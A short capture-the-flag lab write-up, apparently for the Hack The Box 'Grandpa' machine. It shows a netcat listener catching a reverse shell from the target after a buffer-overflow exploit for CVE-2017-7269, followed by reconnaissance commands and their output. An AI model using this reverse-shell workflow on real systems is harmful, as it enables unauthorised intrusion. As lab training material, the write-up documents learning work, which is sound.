Buffer Overflow
^a4ea2d
This is the exploit that I found online.
Executing the modified exploit
┌──(kali㉿kali)-[~/archive/htb/labs/grandpa]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
c:\windows\system32\inetsrv> hostname
granpa
c:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ip address. . . . . . . . . . . . : 10.10.10.14
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2Received the shell.
Initial Foothold established as nt authority\network service via exploiting CVE-2017-7269